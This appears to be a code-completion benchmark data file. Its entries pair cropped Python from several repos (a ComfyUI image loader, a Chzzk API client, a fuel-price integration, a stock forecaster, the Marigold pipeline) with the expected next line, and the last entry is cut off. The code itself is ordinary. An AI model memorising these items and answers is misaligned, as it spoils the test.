"snippet": "def image_to_base64(pli_image, pnginfo=None):\n # 创建一个BytesIO对象,用于临时存储图像数据\n image_data = io.BytesIO()\n\n # 将图像保存到BytesIO对象中,格式为PNG\n pli_image.save(image_data, format='PNG', pnginfo=pnginfo)\n\n # 将BytesIO对象的内容转换为字节串\n image_data_bytes = image_data.getvalue()\n\n # 将图像数据编码为Base64字符串\n encoded_image = \"data:image/png;base64,\" + base64.b64encode(image_data_bytes).decode('utf-8')\n\n return encoded_image"
},
{
"identifier": "read_image_from_url",
"path": "easyapi/util.py",
"snippet": "def read_image_from_url(image_url):\n response = requests.get(image_url)\n img = Image.open(io.BytesIO(response.content))\n return img"
}
] | import base64
import copy
import io
import numpy as np
import torch
import json
from PIL import ImageOps, Image
from nodes import LoadImage
from comfy.cli_args import args
from PIL.PngImagePlugin import PngInfo
from json import JSONEncoder, JSONDecoder
from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url
| 1,382 |
class LoadImageFromURL:
"""
从远程地址读取图片
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
从远程地址读取图片
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
|
class LoadImageFromURL:
"""
从远程地址读取图片
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
从远程地址读取图片
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
| i = base64_to_image(base64Image)
| 2 | 2023-12-19 02:32:10+00:00 | 2k |
bersegosx/passosh | src/passosh/pesso.py | [
{
"identifier": "HeaderField",
"path": "src/passosh/fields.py",
"snippet": "class HeaderField:\n \"\"\"\n An object that represents the fields that display information at the top of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n textAlignment: str = TextAlignment.NATURAL\n\n changeMessage: str = ''"
},
{
"identifier": "PrimaryField",
"path": "src/passosh/fields.py",
"snippet": "class PrimaryField:\n \"\"\"\n An object that represents the fields that display the most important information on a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n\n changeMessage: str = ''"
},
{
"identifier": "SecondaryField",
"path": "src/passosh/fields.py",
"snippet": "class SecondaryField:\n \"\"\"\n An object that represents the fields that display supporting information on the front of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n textAlignment: str = TextAlignment.NATURAL\n\n changeMessage: str = ''"
},
{
"identifier": "BackField",
"path": "src/passosh/fields.py",
"snippet": "class BackField:\n \"\"\"\n An object that represents the fields that display information on the back of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n\n textAlignment: str = TextAlignment.LEFT\n changeMessage: str = ''"
},
{
"identifier": "AuxiliaryField",
"path": "src/passosh/fields.py",
"snippet": "class AuxiliaryField:\n \"\"\"\n An object that represents the fields that display additional information on the front of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n textAlignment: str = TextAlignment.NATURAL\n\n changeMessage: str = ''\n row: int = 0"
},
{
"identifier": "Barcode",
"path": "src/passosh/fields.py",
"snippet": "class Barcode:\n message: str\n format: BarcodeFormat\n messageEncoding: str = 'iso-8859-1'\n\n altText: str = '' # isn’t displayed for watchOS"
},
{
"identifier": "BoardingPassTransitType",
"path": "src/passosh/fields.py",
"snippet": "class BoardingPassTransitType(str, Enum):\n GENERIC = 'PKTransitTypeGeneric'\n AIR = 'PKTransitTypeAir'\n BOAT = 'PKTransitTypeBoat'\n BUS = 'PKTransitTypeBus'\n TRAIN = 'PKTransitTypeTrain'"
},
{
"identifier": "Location",
"path": "src/passosh/fields.py",
"snippet": "class Location:\n \"\"\"\n An object that represents a location that the system uses to show a relevant pass.\n \"\"\"\n latitude: float # in degrees, of the location\n longitude: float # in degrees, of the location\n altitude: float | None = None # in meters, of the location\n\n # the text to display on the lock screen when the pass is relevant.\n # For example, a description of a nearby location, such as “Store nearby on 1st and Main”.\n relevantText: str | None = None"
}
] | from dataclasses import dataclass
from .fields import (HeaderField, PrimaryField, SecondaryField, BackField, AuxiliaryField, Barcode,
BoardingPassTransitType, Location) | 786 |
@dataclass
class Content:
"""
An object that represents the groups of fields that display the information for an event ticket.
"""
headerFields: list[HeaderField] | None = None
primaryFields: list[PrimaryField] | None = None
|
@dataclass
class Content:
"""
An object that represents the groups of fields that display the information for an event ticket.
"""
headerFields: list[HeaderField] | None = None
primaryFields: list[PrimaryField] | None = None | secondaryFields: list[SecondaryField] | None = None | 2 | 2023-12-18 22:51:38+00:00 | 2k |
jonghwanhyeon/python-chzzk | chzzk/chzzk.py | [
{
"identifier": "ChzzkClient",
"path": "chzzk/client.py",
"snippet": "class ChzzkClient(HTTPClient):\n BASE_URL = \"https://api.chzzk.naver.com/\"\n\n def __init__(self, credential: Optional[Credential] = None):\n super().__init__(credential)"
},
{
"identifier": "Credential",
"path": "chzzk/client.py",
"snippet": "class Credential:\n auth: str\n session: str\n\n def as_cookie(self) -> dict[str, str]:\n return {\n \"NID_AUT\": self.auth,\n \"NID_SES\": self.session,\n }"
},
{
"identifier": "GameClient",
"path": "chzzk/client.py",
"snippet": "class GameClient(HTTPClient):\n BASE_URL = \"https://comm-api.game.naver.com/nng_main/\"\n\n def __init__(self, credential: Optional[Credential] = None):\n super().__init__(credential)"
},
{
"identifier": "Channel",
"path": "chzzk/models.py",
"snippet": "class Channel(PartialChannel):\n channel_type: Optional[str] = None\n channel_description: str\n follower_count: int\n open_live: bool"
},
{
"identifier": "ChannelSearchRecord",
"path": "chzzk/models.py",
"snippet": "class ChannelSearchRecord(SearchRecord):\n channel: Channel"
},
{
"identifier": "LiveDetail",
"path": "chzzk/models.py",
"snippet": "class LiveDetail(Live):\n status: str\n close_date: Optional[Annotated[datetime, AfterValidator(to_kst)]] = None\n chat_active: bool\n chat_available_group: str\n paid_promotion: bool\n chat_available_condition: str\n min_follower_minute: int\n channel: PartialChannel\n live_polling_status: Json[LivePollingStatus] = Field(alias=\"livePollingStatusJson\")"
},
{
"identifier": "LiveSearchRecord",
"path": "chzzk/models.py",
"snippet": "class LiveSearchRecord(SearchRecord):\n live: Live\n channel: PartialChannel"
},
{
"identifier": "LiveStatus",
"path": "chzzk/models.py",
"snippet": "class LiveStatus(RawModel):\n live_title: str\n status: str\n concurrent_user_count: int\n accumulate_count: int\n paid_promotion: bool\n adult: bool\n chat_channel_id: str\n category_type: Optional[str] = None\n live_category: Optional[str] = None\n live_category_value: str\n live_polling_status: Json[LivePollingStatus] = Field(alias=\"livePollingStatusJson\")\n fault_status: Any"
},
{
"identifier": "SearchCursor",
"path": "chzzk/models.py",
"snippet": "class SearchCursor(RawModel, Generic[T]):\n size: int\n page: Optional[Page] = None\n data: list[T]"
},
{
"identifier": "User",
"path": "chzzk/models.py",
"snippet": "class User(RawModel):\n has_profile: bool\n user_id_hash: Optional[str] = None\n nickname: Optional[str] = None\n profile_image_url: Optional[str] = None\n penalties: Optional[list[Any]] = None\n official_noti_agree: bool\n official_noti_agree_updated_date: Optional[str] = None\n verified_mark: bool\n logged_in: bool"
},
{
"identifier": "Video",
"path": "chzzk/models.py",
"snippet": "class Video(PartialVideo):\n paid_promotion: bool\n in_key: str\n live_open_date: Annotated[datetime, AfterValidator(to_kst)]\n vod_status: str\n\n prev_video: Optional[PartialVideo] = None\n next_video: Optional[PartialVideo] = None"
},
{
"identifier": "VideoSearchRecord",
"path": "chzzk/models.py",
"snippet": "class VideoSearchRecord(SearchRecord):\n video: VideoMetadata\n channel: PartialChannel"
}
] | from typing import Optional
from chzzk.client import ChzzkClient, Credential, GameClient
from chzzk.models import (
Channel,
ChannelSearchRecord,
LiveDetail,
LiveSearchRecord,
LiveStatus,
SearchCursor,
User,
Video,
VideoSearchRecord,
) | 1,194 |
class ChzzkLive:
def __init__(self, client: ChzzkClient):
self._client = client
async def status(self, channel_id: str) -> LiveStatus:
response = await self._client.get(f"polling/v1/channels/{channel_id}/live-status")
return LiveStatus(**response)
async def detail(self, channel_id: str) -> LiveDetail:
response = await self._client.get(f"service/v1/channels/{channel_id}/live-detail")
return LiveDetail(**response)
class ChzzkSearch:
def __init__(self, client: ChzzkClient):
self._client = client
async def channels(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[ChannelSearchRecord]:
response = await self._client.get(
"service/v1/search/channels",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[ChannelSearchRecord](**response)
async def lives(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[LiveSearchRecord]:
response = await self._client.get(
"service/v1/search/lives",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[LiveSearchRecord](**response)
|
class ChzzkLive:
def __init__(self, client: ChzzkClient):
self._client = client
async def status(self, channel_id: str) -> LiveStatus:
response = await self._client.get(f"polling/v1/channels/{channel_id}/live-status")
return LiveStatus(**response)
async def detail(self, channel_id: str) -> LiveDetail:
response = await self._client.get(f"service/v1/channels/{channel_id}/live-detail")
return LiveDetail(**response)
class ChzzkSearch:
def __init__(self, client: ChzzkClient):
self._client = client
async def channels(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[ChannelSearchRecord]:
response = await self._client.get(
"service/v1/search/channels",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[ChannelSearchRecord](**response)
async def lives(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[LiveSearchRecord]:
response = await self._client.get(
"service/v1/search/lives",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[LiveSearchRecord](**response)
| async def videos(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[VideoSearchRecord]: | 11 | 2023-12-20 22:09:07+00:00 | 2k |
pantherale0/ha-fuelprices | custom_components/fuel_prices/device_tracker.py | [
{
"identifier": "CONF_AREAS",
"path": "custom_components/fuel_prices/const.py",
"snippet": "CONF_AREAS = \"areas\""
},
{
"identifier": "DOMAIN",
"path": "custom_components/fuel_prices/const.py",
"snippet": "DOMAIN = \"fuel_prices\""
},
{
"identifier": "FeulStationEntity",
"path": "custom_components/fuel_prices/entity.py",
"snippet": "class FeulStationEntity(CoordinatorEntity):\n \"\"\"Represents a fuel station.\"\"\"\n\n def __init__(\n self, coordinator: FuelPricesCoordinator, fuel_station_id, entity_id, source\n ) -> None:\n \"\"\"Initialize.\"\"\"\n super().__init__(coordinator)\n self.coordinator: FuelPricesCoordinator = coordinator\n self._fuel_station_id = fuel_station_id\n self._entity_id = entity_id\n self._fuel_station_source = str(source).lower()\n\n @property\n def _fuel_station(self):\n \"\"\"Return the fuel station.\"\"\"\n return self.coordinator.api.configured_sources[\n self._fuel_station_source\n ].location_cache[self._fuel_station_id]\n\n @property\n def unique_id(self) -> str | None:\n \"\"\"Return unique ID.\"\"\"\n return f\"fuelprices_{self._fuel_station_id}_{self._entity_id}\""
},
{
"identifier": "FuelPricesCoordinator",
"path": "custom_components/fuel_prices/coordinator.py",
"snippet": "class FuelPricesCoordinator(DataUpdateCoordinator):\n \"\"\"Fuel Prices data coordinator.\"\"\"\n\n def __init__(self, hass: HomeAssistant, api: FuelPrices, name: str) -> None:\n \"\"\"Init the coordinator.\"\"\"\n super().__init__(\n hass=hass,\n logger=_LOGGER,\n name=name,\n update_interval=timedelta(minutes=30),\n )\n self.api: FuelPrices = api\n\n async def _async_update_data(self):\n \"\"\"Fetch and update data from the API.\"\"\"\n try:\n async with async_timeout.timeout(240):\n return await self.api.update()\n except TimeoutError as err:\n _LOGGER.error(\"Timeout updating fuel price data: %s\", err)\n except TypeError as err:\n _LOGGER.error(\"Error updating fuel price data: %s\", err)\n except Exception as err:\n raise UpdateFailed(f\"Error communicating with API {err}\") from err"
}
] | import logging
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_NAME
from homeassistant.components.device_tracker.config_entry import (
BaseTrackerEntity,
SourceType,
ATTR_SOURCE_TYPE,
ATTR_LATITUDE,
ATTR_LONGITUDE,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from pyfuelprices.const import PROP_FUEL_LOCATION_SOURCE
from .const import CONF_AREAS, DOMAIN
from .entity import FeulStationEntity
from .coordinator import FuelPricesCoordinator | 695 | """Device tracker for fuel prices."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Integration platform creation."""
| """Device tracker for fuel prices."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Integration platform creation.""" | cooridinator: FuelPricesCoordinator = hass.data[DOMAIN][entry.entry_id] | 1 | 2023-12-19 20:54:21+00:00 | 2k |
abdellatif-laghjaj/stock-market-prediction | main.py | [
{
"identifier": "load_data",
"path": "services.py",
"snippet": "@st.cache_data\ndef load_data(ticker, start, end):\n \"\"\"\n Load historical stock price data from Yahoo Finance.\n\n Parameters:\n - ticker (str): Stock symbol (e.g., AAPL).\n - start (str): Start date in the format 'YYYY-MM-DD'.\n - end (str): End date in the format 'YYYY-MM-DD'.\n\n Returns:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n try:\n data = yf.download(ticker, start, end)\n data.reset_index(inplace=True)\n return data\n except Exception as e:\n st.error(f\"Error loading data for {ticker}: {str(e)}\")\n return None"
},
{
"identifier": "plot_data",
"path": "services.py",
"snippet": "def plot_data(data):\n \"\"\"\n Plot historical stock price data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Open'], name=\"stock_open\"))\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Close'], name=\"stock_close\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_multiple_data",
"path": "services.py",
"snippet": "def plot_multiple_data(data, stock_names):\n \"\"\"\n Plot forecasted stock prices for multiple stocks.\n\n Parameters:\n - data (list): List of DataFrames containing forecasted stock price data.\n - stock_names (list): List of stock names corresponding to the forecasted data.\n \"\"\"\n fig = go.Figure()\n for i, stock_data in enumerate(data):\n fig.add_trace(go.Scatter(x=stock_data['ds'], y=stock_data['yhat'], name=f\"yhat - {stock_names[i]}\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_volume",
"path": "services.py",
"snippet": "def plot_volume(data):\n \"\"\"\n Plot historical stock volume data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock volume data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Volume'], name=\"stock_volume\"))\n fig.update_layout(title_text=\"Stock Volume Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
}
] | from time import sleep
from sklearn.metrics import mean_absolute_error
from streamlit_option_menu import option_menu
from datetime import date
from prophet import Prophet
from prophet.plot import plot_plotly
from services import load_data, plot_data, plot_multiple_data, plot_volume
import uuid
import pandas as pd
import streamlit as st | 1,104 |
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
|
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."): | data = load_data(selected_stock, start_date, end_date) | 0 | 2023-12-17 11:38:48+00:00 | 2k |
replicate/cog-marigold | src/model/marigold_pipeline.py | [
{
"identifier": "RGBEncoder",
"path": "src/model/rgb_encoder.py",
"snippet": "class RGBEncoder(nn.Module):\n \"\"\"\n The encoder of pretrained Stable Diffusion VAE\n \"\"\"\n \n def __init__(self, pretrained_path, subfolder=None) -> None:\n super().__init__()\n \n vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder)\n logging.info(f\"pretrained AutoencoderKL loaded from: {pretrained_path}\")\n \n self.rgb_encoder = nn.Sequential(\n vae.encoder,\n vae.quant_conv,\n )\n \n def to(self, *args, **kwargs):\n self.rgb_encoder.to(*args, **kwargs) \n \n def forward(self, rgb_in):\n return self.encode(rgb_in)\n \n def encode(self, rgb_in):\n moments = self.rgb_encoder(rgb_in) # [B, 8, H/8, W/8]\n mean, logvar = torch.chunk(moments, 2, dim=1)\n rgb_latent = mean\n return rgb_latent"
},
{
"identifier": "StackedDepthAE",
"path": "src/model/stacked_depth_AE.py",
"snippet": "class StackedDepthAE(nn.Module):\n \"\"\"\n Tailored pretrained image VAE for depth map.\n Encode: Depth images are repeated into 3 channels.\n Decode: The average of 3 chennels are taken as output.\n \"\"\"\n\n def __init__(self, pretrained_path, subfolder=None) -> None:\n super().__init__()\n\n self.vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder)\n logging.info(f\"pretrained AutoencoderKL loaded from: {pretrained_path}\")\n\n def forward(self, depth_in):\n depth_latent = self.encode(depth_in)\n depth_out = self.decode(depth_latent)\n return depth_out\n\n def to(self, *args, **kwargs):\n self.vae.to(*args, **kwargs)\n\n @staticmethod\n def _stack_depth_images(depth_in):\n if 4 == len(depth_in.shape):\n stacked = depth_in.repeat(1, 3, 1, 1)\n elif 3 == len(depth_in.shape):\n stacked = depth_in.unsqueeze(1)\n stacked = depth_in.repeat(1, 3, 1, 1)\n return stacked\n\n def encode(self, depth_in):\n stacked = self._stack_depth_images(depth_in)\n h = self.vae.encoder(stacked)\n moments = self.vae.quant_conv(h)\n mean, logvar = torch.chunk(moments, 2, dim=1)\n depth_latent = mean\n return depth_latent\n\n def decode(self, depth_latent):\n z = self.vae.post_quant_conv(depth_latent)\n stacked = self.vae.decoder(z)\n depth_mean = stacked.mean(dim=1, keepdim=True)\n return depth_mean"
}
] | import logging
import numpy as np
import torch
from typing import Dict
from diffusers import (
DDIMScheduler,
DDPMScheduler,
PNDMScheduler,
SchedulerMixin,
UNet2DConditionModel,
)
from torch import nn
from torch.nn import Conv2d
from torch.nn.parameter import Parameter
from tqdm.auto import tqdm
from transformers import CLIPTextModel, CLIPTokenizer
from .rgb_encoder import RGBEncoder
from .stacked_depth_AE import StackedDepthAE | 1,288 | # Author: Bingxin Ke
# Last modified: 2023-12-11
class MarigoldPipeline(nn.Module):
"""
Marigold monocular depth estimator.
"""
def __init__(
self,
unet_pretrained_path: Dict, # {path: xxx, subfolder: xxx}
rgb_encoder_pretrained_path: Dict,
depht_ae_pretrained_path: Dict,
noise_scheduler_pretrained_path: Dict,
tokenizer_pretrained_path: Dict,
text_encoder_pretrained_path: Dict,
empty_text_embed=None,
trainable_unet=False,
rgb_latent_scale_factor=0.18215,
depth_latent_scale_factor=0.18215,
noise_scheduler_type="DDIMScheduler",
enable_gradient_checkpointing=False,
enable_xformers=True,
) -> None:
super().__init__()
self.rgb_latent_scale_factor = rgb_latent_scale_factor
self.depth_latent_scale_factor = depth_latent_scale_factor
self.device = "cpu"
# ******* Initialize modules *******
# Trainable modules
self.trainable_module_dic: Dict[str, nn.Module] = {}
self.trainable_unet = trainable_unet
# Denoising UNet
self.unet: UNet2DConditionModel = UNet2DConditionModel.from_pretrained(
unet_pretrained_path["path"], subfolder=unet_pretrained_path["subfolder"]
)
logging.info(f"pretrained UNet loaded from: {unet_pretrained_path}")
if 8 != self.unet.config["in_channels"]:
self._replace_unet_conv_in()
logging.warning("Unet conv_in layer is replaced")
if enable_xformers:
self.unet.enable_xformers_memory_efficient_attention()
else:
self.unet.disable_xformers_memory_efficient_attention()
# Image encoder
self.rgb_encoder = RGBEncoder(
pretrained_path=rgb_encoder_pretrained_path["path"],
subfolder=rgb_encoder_pretrained_path["subfolder"],
)
logging.info(
f"pretrained RGBEncoder loaded from: {rgb_encoder_pretrained_path}"
)
self.rgb_encoder.requires_grad_(False)
# Depth encoder-decoder
| # Author: Bingxin Ke
# Last modified: 2023-12-11
class MarigoldPipeline(nn.Module):
"""
Marigold monocular depth estimator.
"""
def __init__(
self,
unet_pretrained_path: Dict, # {path: xxx, subfolder: xxx}
rgb_encoder_pretrained_path: Dict,
depht_ae_pretrained_path: Dict,
noise_scheduler_pretrained_path: Dict,
tokenizer_pretrained_path: Dict,
text_encoder_pretrained_path: Dict,
empty_text_embed=None,
trainable_unet=False,
rgb_latent_scale_factor=0.18215,
depth_latent_scale_factor=0.18215,
noise_scheduler_type="DDIMScheduler",
enable_gradient_checkpointing=False,
enable_xformers=True,
) -> None:
super().__init__()
self.rgb_latent_scale_factor = rgb_latent_scale_factor
self.depth_latent_scale_factor = depth_latent_scale_factor
self.device = "cpu"
# ******* Initialize modules *******
# Trainable modules
self.trainable_module_dic: Dict[str, nn.Module] = {}
self.trainable_unet = trainable_unet
# Denoising UNet
self.unet: UNet2DConditionModel = UNet2DConditionModel.from_pretrained(
unet_pretrained_path["path"], subfolder=unet_pretrained_path["subfolder"]
)
logging.info(f"pretrained UNet loaded from: {unet_pretrained_path}")
if 8 != self.unet.config["in_channels"]:
self._replace_unet_conv_in()
logging.warning("Unet conv_in layer is replaced")
if enable_xformers:
self.unet.enable_xformers_memory_efficient_attention()
else:
self.unet.disable_xformers_memory_efficient_attention()
# Image encoder
self.rgb_encoder = RGBEncoder(
pretrained_path=rgb_encoder_pretrained_path["path"],
subfolder=rgb_encoder_pretrained_path["subfolder"],
)
logging.info(
f"pretrained RGBEncoder loaded from: {rgb_encoder_pretrained_path}"
)
self.rgb_encoder.requires_grad_(False)
# Depth encoder-decoder | self.depth_ae = StackedDepthAE( | 1 | 2023-12-15 07:19:14+00:00 | 2k |
tungeverest/python-k8s-base | src/app.py | [
{
"identifier": "process_time_log_middleware",
"path": "core/middlewares/https/process_time.py",
